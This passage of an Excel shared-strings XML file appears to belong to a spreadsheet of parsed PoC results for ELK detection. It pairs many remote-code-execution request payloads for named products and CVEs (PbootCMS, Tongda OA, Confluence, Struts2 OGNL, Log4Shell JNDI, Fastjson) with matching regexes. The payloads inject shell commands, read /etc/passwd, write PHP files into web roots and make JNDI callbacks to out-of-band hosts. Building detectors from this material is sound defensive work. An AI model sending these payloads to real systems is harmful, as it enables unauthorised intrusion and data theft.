    <t>.*?(?:/setup\.CGI\?next_file=netgear\.cfg\&amp;todo=syscmd\&amp;cmd=echo%20\{\{randstr\}\}\&amp;curpath=/\&amp;currentsetting\.htm=1).*</t>
  </si>
  <si>
    <t>/setup.CGI?next_file=netgear.cfg&amp;todo=syscmd&amp;cmd=echo%20{{randstr}}&amp;curpath=/&amp;currentsetting.htm=1</t>
  </si>
  <si>
    <t>PbootCMS低版本前台</t>
  </si>
  <si>
    <t>PbootCMS低版本前台_远程命令执行</t>
  </si>
  <si>
    <t>.*?(?:/index\.php/index/index\?keyword=\)\{pboot:if\(1\)\$a=\$_GET\[b\];\$a\(\);;//\)\}\)\}\}\{/pboot:if\}\&amp;b=phpinfo).*</t>
  </si>
  <si>
    <t>/index.php/index/index?keyword=){pboot:if(1)$a=$_GET[b];$a();;//)})}}{/pboot:if}&amp;b=phpinfo</t>
  </si>
  <si>
    <t>天融信_远程命令执行</t>
  </si>
  <si>
    <t>.*?(?:/acc/network/getMacAddr\.php\?eth=%20%7C%20echo%20%27%3C%3Fphp%20echo%20md5%281%29%3Bunlink%28__FILE__%29%3B%3F%3E%27%20%3E%20\{\{randstr\}\}\.php%20%7C%20</t>
  </si>
  <si>
    <t>/acc/network/getMacAddr.php?eth=%20%7C%20echo%20%27%3C%3Fphp%20echo%20md5%281%29%3Bunlink%28__FILE__%29%3B%3F%3E%27%20%3E%20{{randstr}}.php%20%7C%20|/{{randstr}}.php</t>
  </si>
  <si>
    <t>通达OA_远程命令执行</t>
  </si>
  <si>
    <t>.*?(?:/general/appbuilder/web/portal/gateway/getdata\?activeTab=%E5%27%19,1%3D%3Eeval\(base64_decode\(%22ZWNobyBoZWxsb190b25nZGFvYTs=%22\)\)\)%3B/\*\&amp;id=19\&amp;module=Carouselimage).*</t>
  </si>
  <si>
    <t>/general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval(base64_decode(%22ZWNobyBoZWxsb190b25nZGFvYTs=%22)))%3B/*&amp;id=19&amp;module=Carouselimage</t>
  </si>
  <si>
    <t>网康_远程命令执行</t>
  </si>
  <si>
    <t>.*?(?:/debug/list_logfile\.php\?action=restartservice\&amp;bash=;echo\ 202cb962ac59075b964b07152d234b70\ &gt;/Isc/third\-party/httpd/htdocs/test\.txt;).*</t>
  </si>
  <si>
    <t>/debug/list_logfile.php?action=restartservice&amp;bash=;echo 202cb962ac59075b964b07152d234b70 &gt;/Isc/third-party/httpd/htdocs/test.txt;</t>
  </si>
  <si>
    <t>YouPHPtube Encoder系统</t>
  </si>
  <si>
    <t>CVE-2019-5127</t>
  </si>
  <si>
    <t>YouPHPtube Encoder系统_远程命令执行_CVE-2019-5127</t>
  </si>
  <si>
    <t>.*?(?:/objects/getImage\.php\?base64Url=urlencode\(base64\("`echo\ "\ \+\ content\ \+\ "\ &gt;\ "\ \+\ fileName\ \+\ "`"\)\)\&amp;format=png|/objects/randomLowercase\(4\)\ \+\ "\.txt").*</t>
  </si>
  <si>
    <t>/objects/getImage.php?base64Url=urlencode(base64("`echo " + content + " &gt; " + fileName + "`"))&amp;format=png|/objects/randomLowercase(4) + ".txt"</t>
  </si>
  <si>
    <t>CVE-2019-5128</t>
  </si>
  <si>
    <t>YouPHPtube Encoder系统_远程命令执行_CVE-2019-5128</t>
  </si>
  <si>
    <t>.*?(?:/objects/getImageMP4\.php\?base64Url=urlencode\(base64\("`echo\ "\ \+\ content\ \+\ "\ &gt;\ "\ \+\ fileName\ \+\ "`"\)\)\&amp;format=jpg|/objects/randomLowercase\(4\)\ \+\ "\.txt").*</t>
  </si>
  <si>
    <t>/objects/getImageMP4.php?base64Url=urlencode(base64("`echo " + content + " &gt; " + fileName + "`"))&amp;format=jpg|/objects/randomLowercase(4) + ".txt"</t>
  </si>
  <si>
    <t>CVE-2019-5129</t>
  </si>
  <si>
    <t>YouPHPtube Encoder系统_远程命令执行_CVE-2019-5129</t>
  </si>
  <si>
    <t>.*?(?:/objects/getSpiritsFromVideo\.php\?base64Url=urlencode\(base64\("`echo\ "\ \+\ content\ \+\ "\ &gt;\ "\ \+\ fileName\ \+\ "`"\)\)\&amp;format=jpg|/objects/randomLowercase\(4\)\ \+\ "\.txt").*</t>
  </si>
  <si>
    <t>/objects/getSpiritsFromVideo.php?base64Url=urlencode(base64("`echo " + content + " &gt; " + fileName + "`"))&amp;format=jpg|/objects/randomLowercase(4) + ".txt"</t>
  </si>
  <si>
    <t>Confluence系统</t>
  </si>
  <si>
    <t>Confluence系统_远程代码执行_CVE-2022-26134</t>
  </si>
  <si>
    <t>.*?(?:/%24%7B%28%23a%3D%40org\.apache\.commons\.io\.IOUtils%40toString%28%40java\.lang\.Runtime%40getRuntime%28%29\.exec%28%22id%22%29\.getInputStream%28%29%2C%22utf\-8%22%29%29\.%28%40com\.opensymphony\.webwork\.ServletActionContext%40getResponse%28%29\.setHeader%28%22X\-Cmd\-Response%22%2C%23a%29%29%7D/).*</t>
  </si>
  <si>
    <t>/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/</t>
  </si>
  <si>
    <t>Jboss系统</t>
  </si>
  <si>
    <t>CVE-2010-1871</t>
  </si>
  <si>
    <t>Jboss系统_远程代码执行_CVE-2010-1871</t>
  </si>
  <si>
    <t>.*?(?:/admin\-console/index\.seam\?actionOutcome=/pwn\.xhtml%3fpwned%3d%23%7brandomInt\(8000000,\ 10000000\)\*randomInt\(8000000,\ 10000000\)%7d).*</t>
  </si>
  <si>
    <t>/admin-console/index.seam?actionOutcome=/pwn.xhtml%3fpwned%3d%23%7brandomInt(8000000, 10000000)*randomInt(8000000, 10000000)%7d</t>
  </si>
  <si>
    <t>PHP CGI系统</t>
  </si>
  <si>
    <t>CVE-2012-1823</t>
  </si>
  <si>
    <t>PHP CGI系统_远程代码执行_CVE-2012-1823</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?\-d\+allow_url_include%3don\+\-d\+auto_prepend_file%3dphp%3a//input).*</t>
  </si>
  <si>
    <t>/index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input</t>
  </si>
  <si>
    <t>PHPCMS</t>
  </si>
  <si>
    <t>CVE-2018-19127</t>
  </si>
  <si>
    <t>PHPCMS_远程代码执行_CVE-2018-19127</t>
  </si>
  <si>
    <t>.*?(?:/type\.php\?template=tag_\(\)\{\}%3b@unlink\(file\)%3becho\ md5\(\$_GET\[1\]\)%3b\{//\.\./rss|/data/cache_template/rss\.tpl\.php\?1=randomInt\(800000000,\ 1000000000\)).*</t>
  </si>
  <si>
    <t>/type.php?template=tag_(){}%3b@unlink(file)%3becho md5($_GET[1])%3b{//../rss|/data/cache_template/rss.tpl.php?1=randomInt(800000000, 1000000000)</t>
  </si>
  <si>
    <t>Thinkcmf</t>
  </si>
  <si>
    <t>Thinkcmf_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?g=g\&amp;m=Door\&amp;a=index\&amp;content=&lt;\?php%20phpinfo\(\);|/index\.php\?g=g\&amp;m=Door\&amp;a=index\&amp;content=&lt;\?php%20echo%20\{\{verify\}\};).*</t>
  </si>
  <si>
    <t>/index.php?g=g&amp;m=Door&amp;a=index&amp;content=&lt;?php%20phpinfo();|/index.php?g=g&amp;m=Door&amp;a=index&amp;content=&lt;?php%20echo%20{{verify}};</t>
  </si>
  <si>
    <t>安恒Gateway</t>
  </si>
  <si>
    <t>安恒Gateway_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/sslvpn/sslvpn_client\.php\?client=logoImg\&amp;img=x%20/tmp%7Cecho%20%60id%60%20%7Ctee%20/usr/local/webui/test).*</t>
  </si>
  <si>
    <t>/sslvpn/sslvpn_client.php?client=logoImg&amp;img=x%20/tmp%7Cecho%20%60id%60%20%7Ctee%20/usr/local/webui/test</t>
  </si>
  <si>
    <t>Anheng_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/webui/\?g=aaa_portal_auth_local_submit\&amp;bkg_flag=0\&amp;suffix=\{\{urlenc\(`id\+&gt;/usr/local/webui/test\.txt`\)\\\}\\\}).*</t>
  </si>
  <si>
    <t>/webui/?g=aaa_portal_auth_local_submit&amp;bkg_flag=0&amp;suffix={{urlenc(`id+&gt;/usr/local/webui/test.txt`)\}\}</t>
  </si>
  <si>
    <t>Apache_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/c42api/v3/LoginConfiguration\?username=\$\{jndi:ldap://\$\{hostName\}\.\{\{interactsh\-url\}\}/test\}\&amp;url=https://localhost|/c42api/v3/LoginConfiguration\?username=\$\{jndi:ldap://\$\{:\-\{\{rand1\}\}\}\$\{:\-\{\{rand2\}\}\}\.\$\{hostName\}\.username\.\{\{interactsh\-url\}\}/test\}\&amp;url=https://localhost).*</t>
  </si>
  <si>
    <t>/c42api/v3/LoginConfiguration?username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&amp;url=https://localhost|/c42api/v3/LoginConfiguration?username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&amp;url=https://localhost</t>
  </si>
  <si>
    <t>Apache Druid</t>
  </si>
  <si>
    <t>Apache Druid_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/druid/coordinator/v1/lookups/config/\$%7bjndi:ldap:%2f%2f\{\{interactsh\-url\}\}%2ftea%7d).*</t>
  </si>
  <si>
    <t>.*?(?:\?method:%23_memberAccess%3d@ognl\.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org\.apache\.struts2\.ServletActionContext%40getResponse\(\),%23res\.setCharacterEncoding\(%23parameters\.encoding%5B0%5D\),%23w%3d%23res\.getWriter\(\),%23s%3dnew\+java\.util\.Scanner\(@java\.lang\.Runtime@getRuntime\(\)\.exec\(%23parameters\.cmd%5B0%5D\)\.getInputStream\(\)\)\.useDelimiter\(%23parameters\.pp%5B0%5D\),%23str%3d%23s\.hasNext\(\)%3f%23s\.next\(\)%3a%23parameters\.ppp%5B0%5D,%23w\.print\(%23str\),%23w\.close\(\),1\?%23xx:%23request\.toString\&amp;pp=%5C%5CA\&amp;ppp=%20\&amp;encoding=UTF\-8\&amp;cmd=echo%20\{\{verify\}\}).*</t>
  </si>
  <si>
    <t>?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&amp;pp=%5C%5CA&amp;ppp=%20&amp;encoding=UTF-8&amp;cmd=echo%20{{verify}}</t>
  </si>
  <si>
    <t>Apache Solr_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/solr/admin/collections\?action=\$%7Bjndi:ldap://\$%7BhostName%7D\.\{\{interactsh\-url\}\}/a%7D).*</t>
  </si>
  <si>
    <t>/solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D.{{interactsh-url}}/a%7D</t>
  </si>
  <si>
    <t>Dbapp</t>
  </si>
  <si>
    <t>Dbapp_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/webui/\?g=aaa_portal_auth_local_submit\&amp;bkg_flag=0\&amp;suffix=\{\{urlenc\(`id\+&gt;/usr/local/webui/test\.txt`\)\\\}\\\}</t>
  </si>
  <si>
    <t>/webui/?g=aaa_portal_auth_local_submit&amp;bkg_flag=0&amp;suffix={{urlenc(`id+&gt;/usr/local/webui/test.txt`)\}\}|/test.txt</t>
  </si>
  <si>
    <t>织梦_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/plus/flink\.php\?dopost=save\&amp;c=cat%20/etc/passwd).*</t>
  </si>
  <si>
    <t>/plus/flink.php?dopost=save&amp;c=cat%20/etc/passwd</t>
  </si>
  <si>
    <t>Discuz！_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/misc\.php\?action=imme_binding\&amp;response\[result\]=1:2\&amp;scriptlang\[1\]\[2\]|ping%20\-c%203%20\{\{interactsh\-url\}\}).*</t>
  </si>
  <si>
    <t>/misc.php?action=imme_binding&amp;response[result]=1:2&amp;scriptlang[1][2]|ping%20-c%203%20{{interactsh-url}}</t>
  </si>
  <si>
    <t>Elasticsearch_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/_search\?a=\$%7Bjndi%3Aldap%3A%2F%2F\$%7B%3A\-\{\{rand1\}\}%7D\$%7B%3A\-\{\{rand2\}\}%7D\.\$%7BhostName%7D\.search\.\{\{interactsh\-url\}\}%7D).*</t>
  </si>
  <si>
    <t>elk_POC解析结果.xlsx</t>
  </si>
  <si>
    <t>Esafenet</t>
  </si>
  <si>
    <t>Esafenet_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/solr/\{\{core\}\}/dataimport\?command=full\-import\&amp;verbose=false\&amp;clean=false\&amp;commit=false\&amp;debug=true\&amp;core=tika\&amp;name=dataimport\&amp;dataConfig=%0A%3CdataConfig%3E%0A%3CdataSource%20name%3D%22streamsrc%22%20type%3D%22ContentStreamDataSource%22%20loggerLevel%3D%22TRACE%22%20%2F%3E%0A%0A%20%20%3Cscript%3E%3C!%5BCDATA%5B%0A%20%20%20%20%20%20%20%20%20%20function%20poc\(row\)%7B%0A%20var%20bufReader%20%3D%20new%20java\.io\.BufferedReader\(new%20java\.io\.InputStreamReader\(java\.lang\.Runtime\.getRuntime\(\)\.exec\(%22ipconfig%22\)\.getInputStream\(\)\)\)%3B%0A%0Avar%20result%20%3D%20%5B%5D%3B%0A%0Awhile\(true\)%20%7B%0Avar%20oneline%20%3D%20bufReader\.readLine\(\)%3B%0Aresult\.push\(%20oneline%20\)%3B%0Aif\(!oneline\)%20break%3B%0A%7D%0A%0Arow\.put\(%22title%22%2Cresult\.join\(%22%5Cn%5Cr%22\)\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|/solr/admin/cores).*</t>
  </si>
  <si>
    <t>/solr/{{core}}/dataimport?command=full-import&amp;verbose=false&amp;clean=false&amp;commit=false&amp;debug=true&amp;core=tika&amp;name=dataimport&amp;dataConfig=%0A%3CdataConfig%3E%0A%3CdataSource%20name%3D%22streamsrc%22%20type%3D%22ContentStreamDataSource%22%20loggerLevel%3D%22TRACE%22%20%2F%3E%0A%0A%20%20%3Cscript%3E%3C!%5BCDATA%5B%0A%20%20%20%20%20%20%20%20%20%20function%20poc(row)%7B%0A%20var%20bufReader%20%3D%20new%20java.io.BufferedReader(new%20java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(%22ipconfig%22).getInputStream()))%3B%0A%0Avar%20result%20%3D%20%5B%5D%3B%0A%0Awhile(true)%20%7B%0Avar%20oneline%20%3D%20bufReader.readLine()%3B%0Aresult.push(%20oneline%20)%3B%0Aif(!oneline)%20break%3B%0A%7D%0A%0Arow.put(%22title%22%2Cresult.join(%22%5Cn%5Cr%22)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|/solr/admin/cores</t>
  </si>
  <si>
    <t>Gitea</t>
  </si>
  <si>
    <t>Gitea_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/\{\{repo\}\}\.git/info/lfs/objects/\.\.\.\.\.\.%2F\.\.%2F\.\.%2Fetc%2Fpasswd/sth|/api/v1/repos/search\?limit=1).*</t>
  </si>
  <si>
    <t>/{{repo}}.git/info/lfs/objects|/{{repo}}.git/info/lfs/objects/......%2F..%2F..%2Fetc%2Fpasswd/sth|/api/v1/repos/search?limit=1</t>
  </si>
  <si>
    <t>Gwtx</t>
  </si>
  <si>
    <t>Gwtx_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/modules/ping/generate\.php\?send=Ping\&amp;hostname=;id).*</t>
  </si>
  <si>
    <t>/modules/ping/generate.php?send=Ping&amp;hostname=;id</t>
  </si>
  <si>
    <t>汉塔</t>
  </si>
  <si>
    <t>汉塔_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/dgn/dgn_tools/ping\.php\?ipdm=2;id;).*</t>
  </si>
  <si>
    <t>/dgn/dgn_tools/ping.php?ipdm=2;id;</t>
  </si>
  <si>
    <t>Hiboss</t>
  </si>
  <si>
    <t>Hiboss_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/manager/radius/server_ping\.php\?ip=127\.0\.0\.1|cat%20/etc/passwd&gt;\.\./\.\./\{\{randstr\}\}\.txt\&amp;id=1).*</t>
  </si>
  <si>
    <t>/manager/radius/server_ping.php?ip=127.0.0.1|cat%20/etc/passwd&gt;../../{{randstr}}.txt&amp;id=1</t>
  </si>
  <si>
    <t>海康威视_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/svm/api/v1/productFile\?type=product\&amp;ip=127\.0\.0\.1\&amp;/iac/configService/v1/address).*</t>
  </si>
  <si>
    <t>/svm/api/v1/productFile?type=product&amp;ip=127.0.0.1&amp;/iac/configService/v1/address</t>
  </si>
  <si>
    <t>Iaudit</t>
  </si>
  <si>
    <t>Iaudit_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/get_luser_by_sshport\.php\?clientip=1;echo%20"&lt;\?php%20echo%20\{\{verify\}\};unlink\(__FILE__\);\?&gt;"&gt;/opt/freesvr/web/htdocs/freesvr/audit/\{\{filename\}\}\.php;\&amp;clientport=1</t>
  </si>
  <si>
    <t>/get_luser_by_sshport.php?clientip=1;echo%20"&lt;?php%20echo%20{{verify}};unlink(__FILE__);?&gt;"&gt;/opt/freesvr/web/htdocs/freesvr/audit/{{filename}}.php;&amp;clientport=1|/{{filename}}.php</t>
  </si>
  <si>
    <t>Jitsi Meet_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/http\-bind\?room=\$\{jndi:ldap://\$\{:\-\{\{rand1\}\}\}\$\{:\-\{\{rand2\}\}\}\.\$\{hostName\}\.username\.\{\{interactsh\-url\}\}/\{\{str\}\}\}).*</t>
  </si>
  <si>
    <t>Kingdee Erp Binaryformatterproxy Deserialization</t>
  </si>
  <si>
    <t>Kingdee Erp Binaryformatterproxy Deserialization_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/Kingdee\.BOS\.ServiceFacade\.ServicesStub\.DevReportService\.GetBusinessObjectData\.common\.kdsvc|/K3Cloud/Kingdee\.BOS\.ServiceFacade\.ServicesStub\.DevReportService\.GetBusinessObjectData\.common\.kdsvc).*</t>
  </si>
  <si>
    <t>/Kingdee.BOS.ServiceFacade.ServicesStub.DevReportService.GetBusinessObjectData.common.kdsvc|/K3Cloud/Kingdee.BOS.ServiceFacade.ServicesStub.DevReportService.GetBusinessObjectData.common.kdsvc</t>
  </si>
  <si>
    <t>蓝凌_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/data/sys\-common/datajson\.js\?s_bean=sysFormulaSimulateByJS\&amp;script=%66%75%6e%63%74%69%6f%6e%20%74%65%73%74%28%29%7b%20%72%65%74%75%72%6e%20%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%7d%3b%72%3d%74%65%73%74%28%29%3b%72%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%70%69%6e%67%20%2d%63%20%34%20\{\{interactsh\-url\}\}%22%29\&amp;type=1).*</t>
  </si>
  <si>
    <t>Logstash_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/api/logstash/pipeline/\$\{jndi:ldap://\$\{:\-\{\{rand1\}\}\}\$\{:\-\{\{rand2\}\}\}\.\$\{hostName\}\.username\.\{\{interactsh\-url\}\}/\{\{str\}\}\}).*</t>
  </si>
  <si>
    <t>Meite</t>
  </si>
  <si>
    <t>Meite_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/weixin/admin/sync_emp_weixin\.jsp\?emp_json=\[\{%22@type%22:%22\[com\.sun\.rowset\.JdbcRowSetImpl%22\[\{,%22dataSourceName%22:%22ldap://\{\{interactsh\-url\}\}%22,%22autoCommit%22:true\}\]).*</t>
  </si>
  <si>
    <t>/weixin/admin/sync_emp_weixin.jsp?emp_json=[{%22@type%22:%22[com.sun.rowset.JdbcRowSetImpl%22[{,%22dataSourceName%22:%22ldap://{{interactsh-url}}%22,%22autoCommit%22:true}]</t>
  </si>
  <si>
    <t>Metabase_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/api/geojson\?url=\$\{jndi:ldap://\$\{:\-\{\{rand1\}\}\}\$\{:\-\{\{rand2\}\}\}\.\$\{hostName\}\.url\.\{\{interactsh\-url\}\}\}|/api/geojson\?url=\$\{jndi:ldap://\$\{sys:os\.name\}\.\{\{interactsh\-url\}\}\}).*</t>
  </si>
  <si>
    <t>/api/geojson?url=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.url.{{interactsh-url}}}|/api/geojson?url=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}</t>
  </si>
  <si>
    <t>News &amp; Blog Designer Pack</t>
  </si>
  <si>
    <t>News &amp; Blog Designer Pack_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/wp\-admin/admin\-ajax\.php\?0=\{\{marker\}\}</t>
  </si>
  <si>
    <t>/wp-admin/admin-ajax.php?0={{marker}}|/wp-admin/admin-ajax.php?+config-create+/&amp;/&lt;?=base64_decode($_GET[0])?&gt;+/tmp/{{randstr}}.php</t>
  </si>
  <si>
    <t>Nuuo Nvrmini</t>
  </si>
  <si>
    <t>Nuuo Nvrmini_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/upgrade_handle\.php\?cmd=writeuploaddir\&amp;uploaddir=%27;whoami;%27).*</t>
  </si>
  <si>
    <t>Okta_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/login/SAML\?=\$\{jndi:ldap://\$\{:\-\{\{rand1\}\}\}\$\{:\-\{\{rand2\}\}\}\.\$\{hostName\}\.username\.\{\{interactsh\-url\}\}/\{\{str\}\}\}).*</t>
  </si>
  <si>
    <t>Opendreambox</t>
  </si>
  <si>
    <t>Opendreambox_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/webadmin/script\?command=\|cat%20/etc/passwd\|id).*</t>
  </si>
  <si>
    <t>/webadmin/script?command=|cat%20/etc/passwd|id</t>
  </si>
  <si>
    <t>Opensns</t>
  </si>
  <si>
    <t>Opensns_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?s=weibo/Share/shareBox\&amp;query=app=Common%26model=Schedule%26method=runSchedule%26id\[status\]=1%26id\[method\]=Schedule\-%3E_validationFieldItem%26id\[4\]=function%26\[6\]\[\]=%26id\[0\]=cmd%26id\[1\]=assert%26id\[args\]=cmd=system\(ver\)|/index\.php\?s=weibo/Share/shareBox\&amp;query=app=Common%26model=Schedule%26method=runSchedule%26id\[status\]=1%26id\[method\]=Schedule\-%3E_validationFieldItem%26id\[4\]=function%26\[6\]\[\]=%26id\[0\]=cmd%26id\[1\]=assert%26id\[args\]=cmd=system\(id\)).*</t>
  </si>
  <si>
    <t>/index.php?s=weibo/Share/shareBox&amp;query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ver)|/index.php?s=weibo/Share/shareBox&amp;query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(id)</t>
  </si>
  <si>
    <t>PbootCMS About模块</t>
  </si>
  <si>
    <t>PbootCMS About模块_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/index\.php/index/index\?keyword=\]\(http://127\.0\.0\.1/PbootCMS/index\.php/About/2\?keyword=\)\{pboot:if\(1\)\$a=\$_GET\[b\];\$a\(c\);;//\)\}\)\}\}\{/pboot:if\}\&amp;b=print_r).*</t>
  </si>
  <si>
    <t>/index.php/index/index?keyword=](http://127.0.0.1/PbootCMS/index.php/About/2?keyword=){pboot:if(1)$a=$_GET[b];$a(c);;//)})}}{/pboot:if}&amp;b=print_r</t>
  </si>
  <si>
    <t>PbootCMS Content模块</t>
  </si>
  <si>
    <t>PbootCMS Content模块_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/index\.php/index/index\?keyword=\]\(http://127\.0\.0\.1/PbootCMS/index\.php/Content/2\?keyword=\)\{pboot:if\(1\)\$a=\$_GET\[b\];\$a\(c\);;//\)\}\)\}\}\{/pboot:if\}\&amp;b=print_r).*</t>
  </si>
  <si>
    <t>/index.php/index/index?keyword=](http://127.0.0.1/PbootCMS/index.php/Content/2?keyword=){pboot:if(1)$a=$_GET[b];$a(c);;//)})}}{/pboot:if}&amp;b=print_r</t>
  </si>
  <si>
    <t>PbootCMS Index模块</t>
  </si>
  <si>
    <t>PbootCMS Index模块_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/index\.php/index/index\?keyword=\]\(http://127\.0\.0\.1/PbootCMS/index\.php/index/index\?keyword=\)\{pboot:if\(1\)\$a=\$_GET\[b\];\$a\(c\);;//\)\}\)\}\}\{/pboot:if\}\&amp;b=print_r).*</t>
  </si>
  <si>
    <t>/index.php/index/index?keyword=](http://127.0.0.1/PbootCMS/index.php/index/index?keyword=){pboot:if(1)$a=$_GET[b];$a(c);;//)})}}{/pboot:if}&amp;b=print_r</t>
  </si>
  <si>
    <t>PbootCMS List模块</t>
  </si>
  <si>
    <t>PbootCMS List模块_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/index\.php/index/index\?keyword=\]\(http://127\.0\.0\.1/PbootCMS/index\.php/List/2\?keyword=\)\{pboot:if\(1\)\$a=\$_GET\[b\];\$a\(c\);;//\)\}\)\}\}\{/pboot:if\}\&amp;b=print_r).*</t>
  </si>
  <si>
    <t>/index.php/index/index?keyword=](http://127.0.0.1/PbootCMS/index.php/List/2?keyword=){pboot:if(1)$a=$_GET[b];$a(c);;//)})}}{/pboot:if}&amp;b=print_r</t>
  </si>
  <si>
    <t>PbootCMS Parsercontroller</t>
  </si>
  <si>
    <t>PbootCMS Parsercontroller_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/index\.php/Search/index\.html\?field=title\&amp;keyword=\{pboot:if\(system\(ls\)\)\}\{/pboot:if\}\&amp;scode=5|/index\.php/Search/index\.html\?field=title\&amp;keyword=\{pboot:if\(system\(dir\)\)\}\{/pboot:if\}\&amp;scode=5).*</t>
  </si>
  <si>
    <t>/index.php/Search/index.html?field=title&amp;keyword={pboot:if(system(ls))}{/pboot:if}&amp;scode=5|/index.php/Search/index.html?field=title&amp;keyword={pboot:if(system(dir))}{/pboot:if}&amp;scode=5</t>
  </si>
  <si>
    <t>PbootCMS Search模块</t>
  </si>
  <si>
    <t>PbootCMS Search模块_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/index\.php/Search/index\?keyword=\]\(http://127\.0\.0\.1/PbootCMS/index\.php/index/index\?keyword=\)\{pboot:if\(1\)\$a=\$_GET\[title\];\$a\(c\);;//\)\}\)\}\}\{/pboot:if\}\&amp;title=print_r).*</t>
  </si>
  <si>
    <t>/index.php/Search/index?keyword=](http://127.0.0.1/PbootCMS/index.php/index/index?keyword=){pboot:if(1)$a=$_GET[title];$a(c);;//)})}}{/pboot:if}&amp;title=print_r</t>
  </si>
  <si>
    <t>PbootCMS开源建站系统 版本前台</t>
  </si>
  <si>
    <t>PbootCMS开源建站系统 版本前台_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/index\.php/Search/index\?keyword=\{pboot:if\(true\)\$a=\$_GET\[b\];\$a\(\);//%20\)\}\)\}\{/pboot:if\}\&amp;b=phpinfo).*</t>
  </si>
  <si>
    <t>/index.php/Search/index?keyword={pboot:if(true)$a=$_GET[b];$a();//%20)})}{/pboot:if}&amp;b=phpinfo</t>
  </si>
  <si>
    <t>瑞友_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/hmrao\.php\?s=/Admin/appsave\&amp;appid=1'\);select\+'&lt;\?php\+echo\+md5\(\{\{num\}\}\);unlink\(__FILE__\);\?&gt;'\+into\+dumpfile\+'\.\./\.\./WebRoot/\{\{filename\}\}';\-\-\+&lt;/|/\{\{filename\}\}).*</t>
  </si>
  <si>
    <t>/hmrao.php?s=/Admin/appsave&amp;appid=1');select+'&lt;?php+echo+md5({{num}});unlink(__FILE__);?&gt;'+into+dumpfile+'../../WebRoot/{{filename}}';--+&lt;/|/{{filename}}</t>
  </si>
  <si>
    <t>锐捷 Networks</t>
  </si>
  <si>
    <t>锐捷 Networks_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/guest_auth/poc\.php\?cmd=cat%20/etc/passwd).*</t>
  </si>
  <si>
    <t>/guest_auth/poc.php?cmd=cat%20/etc/passwd</t>
  </si>
  <si>
    <t>锐捷_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/view/vpn/autovpn/online_check\.php\?peernode=`echo%20PD9waHAgZWNobyBtZDUoJzk5OTk5OTk5OScpO3VubGluayhfX0ZJTEVfXyk7Pz4=|base64%20\-d%20&gt;%20\{\{filename\}\}\.php`).*</t>
  </si>
  <si>
